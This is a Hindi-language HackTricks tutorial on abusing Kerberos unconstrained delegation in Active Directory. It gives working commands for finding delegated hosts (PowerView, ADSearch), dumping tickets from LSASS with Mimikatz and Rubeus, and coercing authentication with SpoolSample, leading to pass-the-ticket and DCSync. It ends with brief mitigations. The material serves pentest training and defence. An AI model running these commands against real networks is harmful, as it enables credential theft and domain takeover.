Unconstrained Delegation

Reading time: 4 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Unconstrained delegation

यह एक विशेषता है जिसे एक डोमेन प्रशासक डोमेन के अंदर किसी भी कंप्यूटर पर सेट कर सकता है। फिर, जब भी कोई उपयोगकर्ता उस कंप्यूटर पर लॉगिन करता है, उस उपयोगकर्ता का TGT की एक प्रति DC द्वारा प्रदान किए गए TGS के अंदर भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप टिकटों को डंप कर सकते हैं और किसी भी मशीन पर उपयोगकर्ताओं का अनुकरण कर सकते हैं

तो यदि एक डोमेन प्रशासक "Unconstrained Delegation" विशेषता सक्रिय होने के साथ किसी कंप्यूटर पर लॉगिन करता है, और आपके पास उस मशीन के अंदर स्थानीय प्रशासक विशेषाधिकार हैं, तो आप टिकट को डंप कर सकते हैं और कहीं भी डोमेन प्रशासक का अनुकरण कर सकते हैं (डोमेन प्रिवेस्क)।

आप इस विशेषता के साथ कंप्यूटर ऑब्जेक्ट्स को खोज सकते हैं यह जांचकर कि userAccountControl विशेषता में ADS_UF_TRUSTED_FOR_DELEGATION शामिल है या नहीं। आप इसे ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP फ़िल्टर के साथ कर सकते हैं, जो कि पॉवerview करता है:

bash
# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer –Unconstrained –Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs

Administrator (या पीड़ित उपयोगकर्ता) का टिकट Mimikatz या Rubeus के साथ मेमोरी में लोड करें Pass the Ticket.
अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Unconstrained delegation के बारे में अधिक जानकारी ired.team पर।

प्रमाणन को मजबूर करें

यदि एक हमलावर "Unconstrained Delegation" के लिए अनुमति प्राप्त कंप्यूटर को समझौता करने में सक्षम है, तो वह Print server को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है जिससे एक TGT सर्वर की मेमोरी में सहेजा जाएगा।
फिर, हमलावर Print server कंप्यूटर खाते का प्रतिनिधित्व करने के लिए Pass the Ticket हमला कर सकता है।

किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन कराने के लिए आप SpoolSample का उपयोग कर सकते हैं:

bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine>

यदि TGT एक डोमेन कंट्रोलर से है, तो आप DCSync हमला कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।
इस हमले के बारे में अधिक जानकारी ired.team पर।

यहाँ प्रमाणीकरण को मजबूर करने के अन्य तरीके खोजें:

Force NTLM Privileged Authentication

शमन

  • DA/एडमिन लॉगिन को विशिष्ट सेवाओं तक सीमित करें
  • विशेषाधिकार प्राप्त खातों के लिए "खाता संवेदनशील है और इसे प्रतिनिधित्व नहीं किया जा सकता" सेट करें।

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें